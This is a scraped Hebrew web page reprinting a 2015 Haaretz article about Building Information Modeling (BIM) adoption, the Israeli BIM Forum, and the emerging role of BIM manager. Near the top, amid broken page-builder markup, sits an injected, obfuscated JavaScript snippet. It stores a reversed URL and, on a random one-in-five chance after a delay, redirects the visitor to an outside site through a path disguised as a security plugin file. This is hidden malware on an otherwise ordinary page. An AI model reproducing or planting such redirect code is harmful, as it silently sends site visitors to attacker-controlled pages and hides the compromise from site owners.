BIM | BIM – המודל שכל משקיע ויזם נדל"ן חייב להכיר
16114
rtl,page,page-id-16114,page-template-default,ajax_fade,page_not_loaded,,qode-child-theme-ver-1.0.0,qode-theme-ver-7.4,wpb-js-composer js-comp-ver-4.5.2,vc_responsive
 
) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}to_right" text_align="left" video="" video_overlay="" video_overlay_image="" video_webm="" video_mp4="" video_ogv="" video_image="" background_image="" background_image_as_pattern="without_pattern" section_height="" parallax_speed="" background_color="" border_color="" row_negative_margin="" side_padding="" parallax_side_padding="" padding_top="" padding_bottom="" color="" hover_color="" more_button_label="" less_button_label="" button_position="" css_animation="" transition_delay=""]

איך בונים 7 בתי ספר במחיר של 5? איך חוסכים 10%-20% מעלויות הפרוייקט עוד לפני שהתחיל? בגרמניה, אנגליה וצרפת, הממשלות הפכו את ה – BIM למשימה לאומית. בישראל, כמו פעמים רבות. המגזר הפרטי באמצעות פורום BIM  הוא זה שפועל לקדם את הבשורה החדשה בענף הבניייה.

מיכאלה טל / כתבה ב"הארץ" , בניה ציבורית ותשתיות, אוקטובר 2015

השנה היא 1904, העיר בולטימור בארה"ב עולה בלהבות, כששריפה משתוללת כבר שעות רבות ובניינים נפגעים מהאש אחד אחרי השני. הכבאים המקומיים מאבדים תקווה, וצוותי כיבוי מוזנקים מערים סמוכות כדי להציל את המצב. אבלת מהר מאד מסתבר שהם חסרי תועלת בגלל הסיבה הפשוטה, אך המדכאת, שברזי הכיבוי בעיר אינם תואמים לאלה של הערים האחרות. המסקנה שהגיעו אליה בארה"ב, לאחר שהאש כילתה קרוב ל – 1,500 מבנים, היא שיש צורך בסטנדרט אחיד עבור כל הגורמים.ההנחה שחייבים תיאום, כדי למנוע מגדל בבל של ניהול וביצוע פרויקט בענף הבנייה והתשתיות, כפי שקורה כיום לרוב בישראל, היא זו שעומדת מאחורי המגמה העולמית לאימוץ מתודולגיית BIM בישראל. ב – 20 לאוקטובר נערך באודיטוריום של חברת תים, נציגת אוטודסק בישראל, המפגש השני של פורום BIM, אשר נועד להתעדכן בדרכים לקידום ה – BIM  בישראל. יזמים, קבלנים, ספקי שירותים מקצועיים, אדריכלים וגופי ממשל, פועלים להעביר לגורמים בשוק הישראלי את הערך של BIM  ואת הנחיצות של הסטנטרד המתקדם, לניהול פרויקטים של נדל"ן ותשתיות. "אם נחשוב על תרחיש בו לקוח רוצה שינוי בדירה שלו, אז הבקשות צריכות לעבור הרבה אינסטנציות ולקבל אישורים רבים, כדי שהמידע יעבור מהלקוח לבנאי, זה מצב טיפוסי. אנו רואים שמנהלי פרויקטים באתר משקיעים הרבה מזמנם בהעברת התקשורת הזאת", ציין פרופ' רפאל זקס, מהפקולטה להנדסה אזרחית וסביבתית בטכניון, המרצה המרכזי במפגש השני של פורום BIM. "ככל שהפרויקט הופך לגדול ומורכב יותר, לדוגמא בשכונות שלמות או בפרויקטים של תשתית, החסכון הופך לעצום. מחקר מפורסם משנת 2004, של חוקרים מהמכון הלאומי האמריקאי לתקינה, ניסה לסכם מה העלות הנוספת, הבזבוז, מחוסר שיתוף מידע בענף המידע, והם הגיעו למספר הגדול של 15 מיליארד דולר". אמר פרופ' זקס "במדינות המתקדמות, אנו רואים שאימוץ BIM  מכרסם בביזבוז הזה. בבריטניה המתקדמת בתחום, מדברים כיום במחלקת הבינוי של משרד החינוך על כך שבונים 7 בתי ספר במחיר של 5 . זאת לאחר אימוץ מואץ של BIM לאורך 4 שנים. "כולם רוצים BIM. ליזמים זה נותן שליטה. חברות הנדסה יכולות להרוויח ממכירת שירותים ולספק ערך מוסף ללקוחות, וזה גם חוסך כסף, ולכן הממשלה הבריטית מעוניינת". כך אמרה בכנס סטייסי סטון, מומחית עולמית בתחום BIM .

המגמה העולמית – אימוץ מואץ

בריטניה אכן מובילה כיום את המגמה הגלולית של אימוץ BIM, כשהחל מאפריל 2016 כל פרויקט ציבורי יהיה חייב לעמוד ב- BIM רמה 2. המשמעות היא הפחתת שגיאות ופסולת ב – 50%. נורווגיה, הולנד, דנמרק ופינדלנד נמצאות בשלבים של פיתוח תקינה האמורה להסתיים בקרוב. אחריהן נמצאת צרפת, המשקיעה 20 מיליון יורו בפיתוח פרוייקט ה – BIM שלהם וגרמניה. "גרמניה היא סיפור מעניין. היא נחשבת למדינה יעילה, אבל בתחום הבינוי והתשתיות היא סבלה ממספר כשלים. לדוגמא, תחנת הרכבת בשטוטגרט נמצאת בפיגור גדול בתקציב ובזמנים, בניין הפילהרמונית בהמבורג נמצא בחריגה כה גדולה, עד כי העירייה עצמה תורמת כסף לפרויקט כדי לסיימו, ונמל התעופה בברלין כה ישן שהוא מתפורר והשדה החדש עדיין לא שם. לכן כיעד לאומי גרמניה מקדמת כיום את הנושא", אמרה סטון.

תקשורת שחוסכת לכולם

בפשטות, BIM  הוא מתודולוגית עבודה בפרויקטים, המאפשרת תיאום ברמה גבוהה ביותר בין כל הגורמים בפרויקט. BIM מבטיח שהקבלן ידבר בשפה אחידה עם האדריכל, האדריכל יוכל לתקשר ולהתנהל באופן נגיש וברור מול גופי הרישוי, ואפילו הלקוחות הסופיים ייזכו למידע מדויק ואמין על הדירה שלהם. BIM למעשה מיישר קו בין המערכות הטכנולוגיות של כל הגורמים, כדי שיוכלו להעביר מידע מהאחד לשני. ברמה הגבוהה שלו BIM הוא כלי תלת מימדי המאפשר שפה אחידה. כך לדוגמא, קבלן יכול להגיע לשטח ולגלות במבט אחד האם הבניה נעשית לפי התכנון, מבלי להסתבך עם שרטוטי דו מימד. ניתן בקלות להבין את הערך העצום שמתקבל משיטת עבודה יעילה שכזו: פחות טעויות יקרות שמתגלות בשטח כתוצאה מבעיות תקשורת, תכנון מדויק ונכון יותר של תקציבים ולוחות זמנים, ובסופו של דבר חסכון במשאבים ופסולת, וכמובן רווח גדול יותר לכל  הגורמים בפרוייקט. בבניין מגורים אחד או בשכונה מדובר על הימנעות מטעויות קטנות יחסית, אך יקרות עבור הקבלן. כך לדוגמא, בפרויקטי בניה בישראל בהם עובדים על פי עקרונות  BIM, קבלנים מספרים על חסכון של 10%-15%, רק בזכות טיפול יעיל בפסולת. הם מצליחים להימנע מטעויות ועיכובים בבניה שלאחר מכן מייצרת פסולת, שיש לפנות מחוץ ללוח הזמנים המתוכנן. היתרונות של BIM לא מסתיימים בבסוף פרויקט הבינוי, אלא ממשיכים גם לשלב התחזוקה של פרויקטים.

היזמים הישראלים חייבים להיות שותפים

"בישראל, פורום BIM שהושק לפני מספר חודשים הציב את הנושא על מסלול המראה, (לא ברור) ממקומות אחרים בעולם, המוטיבציה מגיעה כיום דווקא מצד יזמים וחברות פרטיות, ולא מהממשלה אך אנו פועלים שזה ישתנה, מה שאנו עושים כאן הוא BIM וולנטרי, בהתנדבות, על מנת לשרת את כל הצדדים המעורבים בפרויקטי בניה ותשתיות, ציין בכנס אריק שיבי, מנהל טכנולוגיות תחום אדריכלות ובניה בחברת תים. "כאשר בריטניה מכניסה לתוקף תקנה המחייבת עבודה על פי התקן בפרוייקטים ציבוריים, אנו מקווים שה – BIM ייהפך כאן לסמכות שיאומץ על ידי היזמים ועל ידי הממשלה". "אחת ממטרות הפורום היא לייצר מאגר ידע בנושא ובסיס לתקינה, ולשם כך תורגם התקן הבריטי, שהוא  המתאים ביותר לאימוץ בישראל, והוא מתפרסם באופן חופשי באתר הפורום.

מקצוע חדש נולד: מנהל BIM

בעוד מקצועות מסוימים נכחדים בעולם הדיגיטלי, ראה ערך "שרטט", מקצועות חדשים נולדים. האימוץ של BIM כתקן מחייב מייצר דרישה למקצוע חדש: מנהל BIM. התקנים בעולם מגדירים כי בפרויקטים גדולים יש צורך במנהל ייעודי לנושא ה – BIM, שמטרתו תהיה להבטיח שיתוף אמין של מידע בין הגורמים השונים – לוודא כי כל גורם מקבל את המידע שהוא זקוק לו. אבל, הדברים נכונים לא רק לפרויקטים גדולים. ככל שהתקנים ותהליכי העבודה יתרחבו, למעשה כל משרד תכנון יידרש למנהל BIM משרדי, שיחזיק בידע הנדרש בנושא, יוכל לעבוד בתיאום מול גורמים אחרים ויהיה מעודכן בתהליכי העבודה הטובים ביותר. בפורום BIM ישראל כבר מתכננים פתיחה של קורסים להכשרת מנהלי BIM משרדיים ולהכשרת מנהלי פרויקט BIM.

[button target="_self" text="חזרה לסיקורים תקשורתיים" link="http://bimisrael.co.il/%D7%9B%D7%AA%D7%91%D7%95-%D7%A2%D7%9C%D7%99%D7%A0%D7%95-2/%D7%A1%D7%99%D7%A7%D7%95%D7%A8%D7%99%D7%9D-%D7%AA%D7%A7%D7%A9%D7%95%D7%A8%D7%AA%D7%99%D7%99%D7%9D/"]